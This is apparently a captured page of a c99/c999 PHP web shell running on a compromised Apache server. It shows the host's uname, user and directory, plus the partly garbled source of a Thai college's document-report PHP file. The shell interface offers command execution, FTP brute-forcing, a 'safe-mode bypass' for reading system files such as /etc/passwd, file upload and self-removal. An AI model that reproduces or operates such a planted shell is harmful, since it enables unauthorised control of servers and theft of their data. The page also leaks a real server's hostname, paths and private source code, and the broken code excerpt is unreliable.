!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     printRepDocPost.php (8.25 KB)      -rw-r--r--
Select action/file-type:
SearchMaxDocGroup(); ?>
">รายงาน รายงานหนังสือที่แจ้งขึ้นเว็บของวิทยาลัย
รายงานหนังสือที่แจ้งขึ้นเว็บของวิทยาลัยประเภท SearchByKey($AnID); $oAn->GetRecord(); echo $oAn->AnName; ?> OIS...

"> SearchByKey($DLCID); $oDlc->GetRecord(); $oDlp1->SearchByKey($oDlc->DlpID); $oDlp1->GetRecord(); if($oDlp1->DlpPID!="0"){ $DlcPS2=$DLCID; }else{ $DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId); } if($GroupID=="110" || $GroupID=="111" || $GroupID=="112" || $GroupID=="115"){ //head $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $DlcSeq=$oDlc->DlcSeq; $DlcSeq2=$oDlc->DlcSeq+1; $oDlc3->SearchByNextDlcID($DlcSeq,$oDlc->docGroup,$oDlc->deptId); $oDlc3->GetRecord(); $DLCID2=$oDlc3->DlcID; if($oDlp->DlpPID=="0"){ $oDlc4->SearchByNextDlcID($DlcSeq2,$oDlc->docGroup,$oDlc->deptId); $oDlc4->GetRecord(); $DlcPS22=$oDlc4->DlcID; }else{ $DlcPS22=$DLCID2; } if($GroupID=="112"){ $oDoc->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID3DrsSendSeeAll2($start,$end,$DocTypeNoStart,$DocTypeNoEnd,$DocSubject,$DocNo,$deptId,$DLCID2,$MaxDocGroup,$DlcPS22); }else{ $oDoc->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID3DrsSend2($start,$end,$DocTypeNoStart,$DocTypeNoEnd,$DocSubject,$DocNo,$deptId,$DLCID2,$MaxDocGroup,$DlcPS22); } }else{ $oDoc->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID32($start,$end,$DocTypeNoStart,$DocTypeNoEnd,$DocSubject,$DocNo,$deptId,$DLCID,$MaxDocGroup,$DlcPS2); } while($oDoc->GetRecord()){ $nomainps='0'; $oDlc1->SearchByKey($oDoc->DlcIDRS); $oDlc1->GetRecord(); //echo "DlcID=".$oDoc->DlcID." Doc-deptId=".$oDlc1->deptId." deptId=".$deptId."
"; if($oDlc1->deptId==$deptId){ if(($i%2) == 0) echo ""; else echo ""; $oRs->SearchByDrsFromDrsIDDrsMainPs($oDoc->DrsID); if($oRs->GetRecord()==1){ $oPS->SearchByKey($oRs->personId); $oPS->GetRecord(); $showname=GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName; }else{ $showname="
-
"; $nomainps=1; } ?>
ที่ ที่หนังสือ เรื่อง ว/ด/ป ที่
สั่งการ
ว/ด/ป ที่
กำหนดเสร็จ
ผู้รับผิดชอบหลัก ว/ด/ป ที่
รับทราบ
ว/ด/ป ที่
ดำเนินการเสร็จ
หมายเหตุ
DocTypeNo); ?>   DocNo; ?>  ".$oDoc->DocSubject; ?> DrsSendDate!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oDoc->DrsSendDate); echo abbreDate2($DocD,'/')."
".a2th($DocT);} ?>
DrsDocDueDate!="0000-00-00"){ echo abbreDate2($oDoc->DrsDocDueDate,'/'); }else{ echo "-"; } ?> DrsDocReceiveDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs->DrsDocReceiveDate); echo abbreDate2($DocD2,'/')."
".a2th($DocT2);}}?>
DocRefAnsDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs->DocRefAnsDate); echo abbreDate2($DocD2,'/')."
".a2th($DocT2);}} ?>
 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--